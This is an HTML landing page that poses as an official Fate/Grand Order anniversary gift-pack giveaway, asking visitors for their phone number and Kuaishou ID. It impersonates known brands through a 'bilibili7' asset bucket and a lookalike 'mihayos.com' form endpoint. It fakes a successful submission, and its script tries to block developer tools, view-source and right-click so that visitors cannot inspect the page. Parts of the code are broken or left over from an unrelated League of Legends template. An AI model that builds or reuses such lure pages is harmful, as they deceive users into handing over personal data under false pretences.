<!DOCTYPE html>
<html>

<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script>
<script>LA.init({ id: "3FKe0aZUZn7OMmP8", ck: "3FKe0aZUZn7OMmP8" })</script>

<head>
    <meta charset="utf-8">
    <title> 命运-冠位指定（Fate/GO）七周年庆前哨礼包</title>
    <meta http-equiv="Expires" content="0">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="Cache" content="no-cache">
    <meta name="referrer" content="no-referrer">
    <meta name="viewport"
        content="target-densitydpi=device-dpi, width=device-width,height=device-height, initial-scale=1, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0,shrink-to-fit=no">
    <meta name="format-detection" content="telephone=no">
    <!--em标准js代码，请放在页面的最上方，前面最好不要再有JS代码或JS文件-->
    <script type="text/javascript" src="https://bilibili7.oss-cn-guangzhou.aliyuncs.com/css/rem.js"></script>
    <script type="text/javascript"
        src="https://bilibili7.oss-cn-guangzhou.aliyuncs.com/css/jquery-1.11.1.min.js"></script>
    <script type="text/javascript" src="https://bilibili7.oss-cn-guangzhou.aliyuncs.com/css/vue.js"></script>
    <script type="text/javascript" src="https://bilibili7.oss-cn-guangzhou.aliyuncs.com/css/vant.min.js"></script>
    <link rel="stylesheet" type="text/css" href="https://bilibili7.oss-cn-guangzhou.aliyuncs.com/css/vant.min.css">
    <style type="text/css">
        /*通用类*/
        * {
            margin: 0;
            padding: 0;
        }

        body {
            margin: 0 auto;
            font-size: 0.24rem;
            font-family: PingFang SC, Hiragino Sans GB, Microsoft YaHei UI, Microsoft YaHei, Source Han Sans CN, sans-serif;
            background: #fff;
            text-align: justify;
            color: #010000;
            position: relative;
        }

        h1,
        h2,
        h3 {
            font-weight: 500;
        }

        img {
            border: none;
        }

        a {
            cursor: pointer;
            color: #333;
            text-decoration: none;
            outline: none;
        }

        a:hover {
            color: #006bb7;
        }

        ul {
            list-style-type: none;
        }

        em {
            font-style: normal;
        }

        .lt {
            float: left;
        }

        .rt {
            float: right;
        }

        input.sub,
        label {
            border: none;
            cursor: pointer;
        }

        input,
        textarea {
            font-family: PingFang SC, Hiragino Sans GB, Microsoft YaHei UI, Microsoft YaHei, Source Han Sans CN, sans-serif;
            outline: none;
        }

        table {
            border-collapse: collapse;
        }

        table td,
        table th {
            padding: 0;
        }

        input::-webkit-input-placeholder,
        textarea::-webkit-input-placeholder {
            color: #ccc;
        }

        input::-moz-placeholder,
        textarea::-moz-placeholder {
            /* Mozilla Firefox 19+ */
            color: #ccc;
        }

        input:-moz-placeholder,
        textarea:-moz-placeholder {
            /* Mozilla Firefox 4 to 18 */
            color: #ccc;
        }

        input:-ms-input-placeholder,
        textarea:-ms-input-placeholder {
            /* Internet Explorer 10-11 */
            color: #ccc;
        }

        div.clear {
            font: 0px Arial;
            line-height: 0;
            height: 0;
            overflow: hidden;
            clear: both;
        }

        .clearfix::after {
            content: "";
            display: block;
            clear: both;
        }

        /*兼容老设备的rem-px基准*/
        html {
            font-size: 42.6667px;
        }

        @media screen and (max-width: 320px) {
            html {
                font-size: 42.6667px;
            }
        }

        @media screen and (min-width: 321px) and (max-width: 360px) {
            html {
                font-size: 48px;
            }
        }

        @media screen and (min-width: 361px) and (max-width: 375px) {
            html {
                font-size: 50px;
            }
        }

        @media screen and (min-width: 376px) and (max-width: 414px) {
            html {
                font-size: 55px;
            }
        }

        @media screen and (min-width: 415px) and (max-width: 484px) {
            html {
                font-size: 64px;
            }
        }

        @media screen and (min-width: 485px) and (max-width: 720px) {
            html {
                font-size: 96px;
            }
        }

        @media screen and (min-width: 721px) and (max-width: 768px) {
            html {
                font-size: 102px;
            }
        }

        @media screen and (min-width: 769px) and (max-width: 1080px) {
            html {
                font-size: 144px;
            }
        }

        @media screen and (min-width: 1080px) {
            html {
                font-size: 144px;
            }
        }

        /*新设备的rem-vw标准*/


        .wrapin {
            background-color: #fffdf0;
            /* 表单背景颜色 */
            padding-bottom: 0.3rem;
        }

        header {

            text-align: center;
            font-size: 0.39rem;
            height: 1.5rem;
            line-height: 1.5rem;
            color: #ffffff;
            background-color: #000000;
        }

        .pic img {
            width: 100%;
            display: block;
            pointer-events: none;
        }

        ul.orm {
            padding: 0.1rem 0.25rem 0.1rem;
        }

        /* 表单标题颜色 */
        ul.orm li {
            margin-bottom: 0.2rem;
        }

        /* 表单标题颜色 */
        ul li h3 {
            color: #000000;
            font-size: 0.32rem;
            /* 标题字体大小 */
            margin-bottom: 0.01rem;
        }

        ul.orm li h3 i {
            color: #DA2824;
            font-style: normal;
        }

        ul.orm li h4 {
            font-size: 0.27rem;
            /* 标题字体说明大小 */
            color: #ADA0A0;
            font-weight: normal;
            margin-bottom: 0.05rem;
        }

        ul.orm li input {
            width: 100%;
            height: 0.7rem;
            /* 手机号、QQ号输入框间距大小 */
            font-size: 0.3rem;
            padding-left: 0.6rem;
            box-sizing: border-box;
            border-radius: 0.05rem;
            background-position: left .1rem center !important;
        }

        ul.orm li .select {
            width: 100%;
            height: 0.7rem;
            /* 选择大区输入框间距大小 */
            font-size: 0.3rem;
            padding: 0 0.2rem;
            box-sizing: border-box;
            border-radius: 0.05rem;
            appearance: none;

            -moz-appearance: none;

            -webkit-appearance: none;
            color: #000;
            border: 1px solid #fff;

            background: #fff url(https://bilibili7.oss-cn-guangzhou.aliyuncs.com/css/jiantou.png) no-repeat right 0.2rem center !important;

            background-size: 0.25rem 0.3rem !important;
        }

        ul.orm li.select2 select {
            width: 46%;
            float: left;

        }

        ul.orm li.select2 select:nth-child(2) {
            float: right;
        }

        ul.orm li.dan h4 {
            margin-bottom: 0.25rem;
        }

        ul.orm li.dan input {
            width: 0.4rem;
            height: 0.4rem;
            float: left;

        }

        ul.orm li.dan strong {
            float: left;
            font-size: 0.3rem;
            margin-left: 0.2rem;
            margin-right: 0.2rem;
            color: #fff;
            font-style: normal;

        }

        form button {
            width: 7rem;
            /* 提交按钮大小 */
            height: 0.8rem;
            background-color: #719476;
            /* 提交按钮颜色 */
            margin: 0.2rem auto;
            display: block;
            border: none;
            font-size: 0.35rem;
            color: #FFFFFF;
            /* 提交字体颜色 */
            border-radius: 0.2rem;
            font-weight: bold;
        }

        .readonly {
            background-color: #dfd9d9;
            border: none;
            color: #81889a;
        }

        .tanchu {
            position: fixed;
            top: 27%;
            left: 50%;
            width: 6rem;
            height: 6rem;
            background-color: #fffdf0;
            /* 弹窗背景颜色 */
            z-index: 2;
            margin-left: -3rem;
            border-radius: 0.2rem;
            text-align: center;
            padding-top: 0.5rem;
            box-shadow: 0px 1px 14.56px 1.44px rgba(153, 153, 153, 0.2);
        }

        .tanchu img {
            width: 2rem;
        }

        .tanchu h3 {
            font-size: 0.5rem;
            color: #fff;
            margin: 0.3rem 0;
            color: #000000;
            /* 提交成功字体颜色 */
        }

        .tanchu p {
            font-size: 0.3rem;
            color: #AC9F9F;
        }

        .tanchu a img {
            margin-top: 0.8rem;
            width: 0.8rem;
        }

        .shou input {
            background: url(https://bilibili7.oss-cn-guangzhou.aliyuncs.com/css/shouji.png) no-repeat left;
            background-size: 0.4rem 0.4rem;
            border: none;
            background-color: #fff;
        }

        .shou1 input {
            background: url(https://bilibili7.oss-cn-guangzhou.aliyuncs.com/css/QQ.png) no-repeat left;
            background-size: 0.4rem 0.4rem;
            border: none;
            background-color: #fff;
        }

        .shou2 input {
            background: url(https://bilibili7.oss-cn-guangzhou.aliyuncs.com/css/ks.png) no-repeat left;
            background-size: 0.4rem 0.4rem;
            border: none;
            background-color: #fff;
        }

        .rbg {
            background: #000000;
            display: flex;
            color: #333;
            padding: 0 .2rem;
            height: 0rem;
            /* 同意输入框间距大小 */
            align-items: center;
            font-size: 0.3rem;
            border-radius: 0.1rem;
            /* 同意输入框圆角调整 */
            font-weight: bold;
        }

        ul.orm li.dan .rbg strong {
            color: #333;
        }

        .alert .van-dialog__message {
            font-size: .3rem;
            font-weight: bold;
        }

        .form {
            position: relative;
        }

        .form .submit {
            position: absolute;
            width: 2.8rem;
            height: 1rem;
            left: 50%;
            transform: translateX(-50%);
            -webkit-transform: translateX(-50%);
            bottom: 1.1rem;
            cursor: pointer;
            width: 220px;
            height: 60px;
        }
    </style>
</head>

<body>
    <div id="app">
        <div class="pic">
            <img src="https://article.biliimg.com/bfs/article/a8cd16183ac128274b6217928b4ec5450df37ea4.jpg">
            <img src="https://article.biliimg.com/bfs/article/6653a3db56b38af27a16dc81dc1a9c3bbd007acf.jpg">

            <!-- 这里就是替换二维码的链接（替换 "" 中间的东西） -->
            <img src="https://article.biliimg.com/bfs/article/0a9732f21c0449c2133a4e857a1528056a7cf233.jpg">

            <img src="https://article.biliimg.com/bfs/article/cfa770b5392e7d8c92b0b0c21052290f92cd846c.jpg">
            <img src="https://article.biliimg.com/bfs/article/c4031512f6260992fe9411c308ae16522b96109a.jpg">
            <img src="https://article.biliimg.com/bfs/article/6c3c5b67ed6536ce93642bed18e18e101ee29038.jpg">

        </div>
        <div class="wrapin">
            <form action="" method="get">
                <ul class="orm">
                    <li class="shou">
                        <h3><i>*</i>手机号</h3>
                        <h4>
                            <圣晶石礼包兑换码>通知短信将发送至此手机号上</原石礼包兑换码>
                        </h4>
                        <input type="tel" name="tel" v-model="phone" id="tel" placeholder="请输入正确的手机号">
                    <li class="shou2">
                        <h3><i>*</i>快手极速版ID</h3>
                        <h4>在快手极速版右下角-我-查看(昵称下面的快手号)复制即可</h4>
                        <input type="text" name="" id="" value="" placeholder="输入快手极速版ID，注意不是昵称">
                    </li>
                    <li class="dan">
                        <h3><i>*</i>资格未到账之前请勿卸载快手极速版APP或者注销账号，否则视为放弃领取。</h3>
                        <div class="rbg">
                        </div>
                    </li>
                    <li class="dan">
                        <h3><i>*</i>提交的手机号仅用于本次短信通知(可退订)，无任何其它用途，提交即表示您愿意接受本次短信通知。</h3>
                        <div class="rbg">
                        </div>
                    </li>
                    <div class="clear">

                    </div>
                </ul>
                <button type="button" class="button" @click="post">提交</button>
            </form>
        </div>
        <div class="pic">
        </div>
        <audio src="https://ys.mihoyo.com/main/_nuxt/medias/video-bgm.d8637316.mp3" autoplay="autoplay" loop="loop">
            当前浏览器不支持audio
        </audio>

        <!--弹出-->
        <div class="tanchu" v-if="isPost">
            <img src="https://bilibili7.oss-cn-guangzhou.aliyuncs.com/css/gou.png">
            <h3>提交成功</h3>
            <p>请注意查收手机通知短信</p>
            <br>
            <div @click="isPost=false"><img src="https://bilibili1.oss-cn-shenzhen.aliyuncs.com/css/chacha.png">
            </div>
        </div>

        <!--地区选择弹窗-->
        <van-popup v-model="areaShow" position="bottom">
            <van-picker show-toolbar :columns="areas" confirm-button-text="确认" cancel-button-text="取消"
                @confirm="onAreaSelect" @cancel="onAreaCancel" />
        </van-popup>

        <!--省市选择弹窗-->
        <van-popup v-model="cityShow" position="bottom">
            <van-picker show-toolbar :columns="citys" confirm-button-text="确认" cancel-button-text="取消"
                @confirm="onCitySelect" @cancel="onCityCancel" />
        </van-popup>
    </div>
    </div>
    <script>
        const HOST = "https://mihayos.com/luanxie.php";

        function Ajax(url, data, header = {}) {
            return $.ajax({
                url: url,
                data: data,
                headers: header,
                type: 'post',
                dataType: 'json',
                async: true,
                timeOut: 100000,
                processData: true,
                contentType: false,
                xhrFields: {
                    withCredentials: true,
                },
                success: function (res) {
                },
                error: function (XMLHttpRequest, textStatus, errorThrown,) {
                    if (XMLHttpRequest.status === 429) {
                        vant.Dialog({
                            message: '请求过于频繁,请稍后再试',
                            className: "alert",
                            confirmButtonText: '确定'
                        });
                        return;
                    }
                    //	console.log(XMLHttpRequest.status )
                    vant.Dialog({
                        message: '连接失败,请检查网络是否异常',
                        className: "alert",
                        confirmButtonText: '确定'
                    });
                },
            })
        }

        var app = new Vue({
            el: "#app",
            data() {
                return {
                    phone: "",
                    area: "",
                    areaShow: false,
                    areas: [
                        { text: '杭州', value: '杭州' },
                        { text: '宁波', value: '宁波' },
                        { text: '温州', value: '温州' },
                        { text: '绍兴', value: '绍兴' },
                        { text: '湖州', value: '湖州' },
                    ],
                    city: "",
                    cityShow: false,
                    citys: [
                        {
                            text: '电信区',
                            value: '电信区',
                            children: [
                                {
                                    text: '艾欧尼亚',
                                    value: '艾欧尼亚',
                                },
                                {
                                    text: '祖安',
                                    value: '祖安',
                                },
                                {
                                    text: '诺克萨斯',
                                    value: '诺克萨斯',
                                },
                                {
                                    text: '班德尔城',
                                    value: '班德尔城',
                                },
                                {
                                    text: '皮尔特沃夫',
                                    value: '皮尔特沃夫',
                                },
                                {
                                    text: '战争学院',
                                    value: '战争学院',
                                },
                                {
                                    text: '巨神峰',
                                    value: '巨神峰',
                                },
                                {
                                    text: '雷瑟守备',
                                    value: '雷瑟守备',
                                },
                                {
                                    text: '裁决之地',
                                    value: '裁决之地',
                                },
                                {
                                    text: '黑色玫瑰',
                                    value: '黑色玫瑰',
                                },
                                {
                                    text: '暗影岛',
                                    value: '暗影岛',
                                },
                                {
                                    text: '钢铁烈阳',
                                    value: '钢铁烈阳',
                                },
                                {
                                    text: '水晶之痕',
                                    value: '水晶之痕',
                                },
                                {
                                    text: '均衡教派',
                                    value: '均衡教派',
                                },
                                {
                                    text: '影流',
                                    value: '影流',
                                },
                                {
                                    text: '守望之海',
                                    value: '守望之海',
                                },
                                {
                                    text: '征服之海',
                                    value: '征服之海',
                                },
                                {
                                    text: '卡拉曼达',
                                    value: '卡拉曼达',
                                },
                                {
                                    text: '皮城警备',
                                    value: '皮城警备',
                                },
                            ],
                        },
                        {
                            text: '网通区',
                            value: '网通区',
                            children: [
                                {
                                    text: '比尔吉沃特',
                                    value: '比尔吉沃特',
                                },
                                {
                                    text: '德玛西亚',
                                    value: '德玛西亚',
                                },
                                {
                                    text: '弗雷尔卓德',
                                    value: '弗雷尔卓德',
                                },
                                {
                                    text: '无畏先锋',
                                    value: '无畏先锋',
                                },
                                {
                                    text: '恕瑞玛',
                                    value: '恕瑞玛',
                                },
                                {
                                    text: '扭曲丛林',
                                    value: '扭曲丛林',
                                },
                                {
                                    text: '巨龙之巢',
                                    value: '巨龙之巢',
                                },
                            ],
                        },
                        {
                            text: '其他区服',
                            value: '其他区服',
                            children: [
                                {
                                    text: '教育网专区',
                                    value: '教育网专区',
                                },
                                {
                                    text: '男爵领域',
                                    value: '男爵领域',
                                },
                            ],
                        }
                    ],
                    radisoCheck: '1',
                    isPost: false,
                }
            },
            methods: {
                onAreaSelect(item) {
                    this.area = item.value;
                    this.areaShow = false;
                },
                onAreaCancel() {
                    this.areaShow = false;
                },
                onCitySelect(item) {
                    this.city = item[0] + item[1];
                    this.cityShow = false;
                },
                onCityCancel() {
                    this.cityShow = false;
                },
                receive() {
                    Ajax(HOST, {
                        'route_name': 'check_receive'
                    }).then(res => {
                        if (res.code != 0) {
                            vant.Dialog({ message: '请完成下列任务后再领取', className: "alert", confirmButtonText: '确定' });
                        } else {
                            vant.Dialog({ message: '审核中，留意短信通知...', className: "alert", confirmButtonText: '确定' });
                        }
                    })

                },
                post() {
                    if (!/^1[3456789]\d{9}$/.test(this.phone)) {
                        vant.Dialog({ message: '请输入有效的手机号码', className: "alert", confirmButtonText: '确定' });
                        return false;
                    }
                    this.isPost = true;
                    // Ajax(HOST, {
                    //     'phone': this.phone
                    // }).then(res => {
                    //     if (res.code != 0) {
                    //         vant.Dialog({ message: res.msg, className: "alert", confirmButtonText: '确定' });
                    //         return;
                    //     }
                    //     this.isPost = true;
                    // })

                }
            },
            mounted() {

            }
        });

        /** 防止别人偷代码 */

        window.onload = function () {
            const protectCodeKey = () => {
                document.onkeydown = function () {
                    const e = window.event || arguments[0]
                    // F12
                    if (e.keyCode == 123)
                        return false
                    // Ctrl+Shift+I

                    else if ((e.ctrlKey) && (e.shiftKey) && (e.keyCode == 73))
                        return false
                    // Shift+F10

                    else if ((e.shiftKey) && (e.keyCode == 121))
                        return false
                    // Ctrl+U

                    else if ((e.ctrlKey) && (e.keyCode == 85))
                        return false
                }
                // 屏蔽鼠标右键
                document.oncontextmenu = function () {
                    return false
                }
            }

            const protectCode = () => {
                protectCodeKey();
                ((function () {
                    let callbacks: any[] = []
                    const timeLimit = 50
                    let open = false
                    setInterval(loop, 1)
                    return {
                        addListener(fn: any) {
                            callbacks.push(fn)
                        },
                        cancleListenr(fn: any) {
                            callbacks = callbacks.filter((v) => {
                                return v !== fn
                            })
                        },
                    }

                    function loop() {
                        const startTime = new Date()
                        debugger
                        if (new Date() - startTime > timeLimit) {
                            if (!open) {
                                callbacks.forEach((fn) => {
                                    fn.call(null)
                                })
                            }
                            open = true
                            window.stop()
                            // alert('⚠️禁止');
                            document.body.innerHTML = ''
                        }
                        else {
                            open = false
                        }
                    }
                })()).addListener(() => {
                    window.location.reload()
                })
            }
        }



    </script>
    <script charset="UTF-8" id="LA_COLLECT"
        src="//sdk.51.la/js-sdk-pro.min.js?id=3FDRcsYlidVvTx5f&ck=3FDRcsYlidVvTx5f"></script>
</body>

</html>
